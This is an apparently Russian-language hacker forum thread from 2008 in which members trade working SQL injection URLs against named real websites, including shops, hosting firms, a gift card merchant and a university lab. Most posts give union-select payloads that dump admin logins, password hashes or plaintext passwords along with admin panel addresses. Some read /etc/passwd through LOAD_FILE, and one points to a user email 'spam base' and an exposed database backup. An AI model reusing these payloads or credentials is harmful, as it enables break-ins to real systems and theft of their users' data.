SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://www.kulisa.eu/index.php?p=article&id=-1+union+select+1,2,login,password,5,6,7,8+from+users+limit+0,1

    LOGIN:admin
    PASS:i@srle

    http://www.kulisa.eu/admin/

    P.S. Очередной беспонтовый ресурс....
     
    2 people like this.
  2. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    http://dontime.dn.ua/index.php?new=99998009+union+select+1,2,3,4,concat(user_login,char(58),user_password),6,7,8,9,10,11,12+from+users+limit+0,1/*
     
    1 person likes this.
  3. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    https://shop.invictusnetworks.com/detail.php?id=-16066+union+select+1,concat_ws(0x3A3a,version(),database()),3,4,5,6,7,8,9,10,11,12/*

    4.0.18::estore
     
    #6743 ThreeD, 9 Nov 2008
    Last edited: 9 Nov 2008
    2 people like this.
  4. Zinus

    Zinus Banned

    Joined:
    8 Aug 2008
    Messages:
    17
    Likes Received:
    10
    Reputations:
    1
    http://www.webhostinglogic.com/support/faq.php?cat=18+union+select+1,2,3+from+mysql.users/* - какой то хостинг буржуйский
    http://ru-hosting.ru/article.php/?sid=999+union+select+1,2,user(),4,5,6/*
     
    3 people like this.
  5. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    Lpl.arizona.edu - PR 7
    Department of Planetary Sciences and Lunar Laboratory
    5 ветка..
    таблы..

    в базе ниче такого не нашел )

    (с) VITAL
     
    #6745 sabe, 9 Nov 2008
    Last edited: 9 Nov 2008
    2 people like this.
  6. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    914
    Reputations:
    363
    user(): infosfera@localhost
    database(): infosfera
    version(): 4.0.24_Debian-10sarge1-log
    type db: MSSQL
     
    _________________________
    1 person likes this.
  7. molotovkeyt

    molotovkeyt Member

    Joined:
    2 Nov 2008
    Messages:
    2
    Likes Received:
    8
    Reputations:
    -1
    http://business.za.msn.com/msn/view_article.php?id=-1+union+select+1,version(),3,4,5,6,7--

    5.1.17-beta :)
     
    1 person likes this.
  8. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://www.coffeetea.info/ee.php?page=topics&action=showcomments&id=717+AND+ascii(lower(substring(version(),1,1)))=53--
    version: 5.*
    покопает кто дальше?
     
  9. Zinus

    Zinus Banned

    Joined:
    8 Aug 2008
    Messages:
    17
    Likes Received:
    10
    Reputations:
    1
    http://lib.rin.ru/cgi-bin/new.pl?art=-1'+union+select+null,LOAD_FILE('/etc/passwd'),null/*
     
    2 people like this.
  10. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://infosfera.sfo.ru/a/articles.php?cat_id=20&id=195+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12+LIMIT+1,1/*
    user(): infosfera@localhost
    database(): infosfera
    version(): 4.0.24_Debian-10sarge1-log
    type db: MSSQL
     
  11. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Zinus
    Вот ещё несколько

    /etc/my.cnf
    /etc/apache/conf/httpd.conf
    /etc/group
    /etc/logrotate.d/vsftpd.log
     
  12. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Вот скуля от меня:
    Code:
    http://wow.cybergame.su/index.php?newsid=-25+union+select+1,2,3,concat_ws(char(58),gmlevel,username,char(58),id,char(58),sha_pass_hash,char(58),sessionkey,char(58),v,char(58),s,char(58),email,char(58),joindate,char(58),last_ip,char(58),failed_logins,char(58),locked,char(58),last_login,char(58),online,char(58),tbc,char(58),mutetime,char(58),%20locale,char(58)),5,6+from+account--
    P.S:там кста не плохая спам база будет)
    ---------------------------------
    И вот еше одна:
    Code:
    http://www.cdirani.com/zcat.php?id=-1+union+select+1,2,3,concat_ws(0x3a,id,user,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+admin/*
    Админка:
    Code:
    http://www.cdirani.com/admin/login.php
    Логин/пасс/ид:
    Code:
    admin:alisobhani:1
    Вродь расшифровал,но они почему то не подходят(((

    Тут канешно нету спам базы но все же...
     
    #6752 -m0rgan-, 9 Nov 2008
    Last edited: 9 Nov 2008
    1 person likes this.
  13. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Gift card merchant

    5.0.51a-community

    Бд,таблицы,колонки:

    Code:
    Дампите сами, пятая ж версия (очень много таблиц, сюда не влезут) :) 


    Проверяем юзеров на админа:
    http://www.theucard.com/master/db_backup.sql -
    21метр.
    Полезно, если надо будет получить таблицы\поля xcart (как памятка)).Можно посписывать (=

    dir'Ы:

    Code:
    http://www.theucard.com/test/
    http://www.theucard.com/master/
    http://www.theucard.com/_borders
    http://www.theucard.com/_vti_bin
    http://www.theucard.com/banners
    http://www.theucard.com/cpanel
    http://www.theucard.com/documents
    http://www.theucard.com/downloads
    http://www.theucard.com/files
    http://www.theucard.com/gallery
    http://www.theucard.com/images
    http://www.theucard.com/master
    http://www.theucard.com/mobile
    http://www.theucard.com/my
    http://www.theucard.com/register
    http://www.theucard.com/terminal
    http://www.theucard.com/test
    http://www.theucard.com/webmail
    http://www.theucard.com/y
     
    #6753 ThreeD, 9 Nov 2008
    Last edited: 9 Nov 2008
    2 people like this.
  14. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    http://www.lgtmerchant.com/shop/checkout.php?id=1+AND+substring(version(),1,1)=4/*&goods=6

    Шоп.Четвёрочка. Принтабельных нет.
     
  15. FNS

    FNS Member

    Joined:
    6 Nov 2008
    Messages:
    16
    Likes Received:
    11
    Reputations:
    0
    http://koleso.topof.ru

    Code:
    http://koleso.topof.ru/testing_info.php?id=-7+union+select+1,2,3,4,concat_ws(0x3a,admin_login,admin_password),6,7,8+from+admins
    news:044e7b0ce67db55376abda253f52e101:1b
    tyre:c1d42f7311bfb28391292190c0a7a904:30
    disk:10f43033d0b00ecccfc676bb6baa3f8e:64
    auto:12794736bba2d6fc3b41e0b013d55178:1a
    v.savosin:046a47fda9108dcc3cbd9d9ac0080ab6:84
    hadmin:dea6235570ff43527546bfa39b1a7eeb:f6
    Админка:
    Code:
    http://koleso.topof.ru/admin/login.php
     
    3 people like this.
  16. MaDfUn

    MaDfUn Elder - Старейшина

    Joined:
    2 Feb 2007
    Messages:
    28
    Likes Received:
    10
    Reputations:
    0
    http://www.profilaktika.ru/index.php?id_mag=35&id_st=659&id_rub=-323+UNION+SELECT+1,concat(0x73716C696E6A666C64,AES_DECRYPT(AES_ENCRYPT(user,0x71),0x71)),3,4,5+FROM+mysql.user/*
    http://www.profilaktika.ru/index.php?id_mag=35&id_st=659&id_rub=-323+UNION+SELECT+1,concat(0x73716C696E6A666C64,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71)),3,4,5+FROM+mysql.user/*


    sqlinjfldodno-kashniki:sqlinjfld65204190655dbf01
     
  17. FNS

    FNS Member

    Joined:
    6 Nov 2008
    Messages:
    16
    Likes Received:
    11
    Reputations:
    0
    МЭШ — американский сериал

    Code:
    http://www.4077th.ru/page.php?id=1453+and+1=0+union+select+1,[COLOR=DarkRed]2[/COLOR],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
    Вывод через ошибку:
    От CMS с таблицы Users:
    С таблицы administrators:
    От форума:
     
    #6757 FNS, 10 Nov 2008
    Last edited: 10 Nov 2008
    1 person likes this.
  18. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    В продолжение темы

    5.0.45-community
     
  19. plutus

    plutus Member

    Joined:
    3 Nov 2008
    Messages:
    25
    Likes Received:
    8
    Reputations:
    1

    http://m.motivepath.com/jabberdemo/merchant-iphone.php?id=-181+union+select+1,concat_ws(0x03a,user,password),3,4,5,6,7+from+mysql.user/*
     
    1 person likes this.
  20. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    http://realestates-bg.eu/sgrada.php?page=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a,user,pass),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+admin+limit+0,1

    http://realestates-bg.eu/admin
     
Thread Status:
Not open for further replies.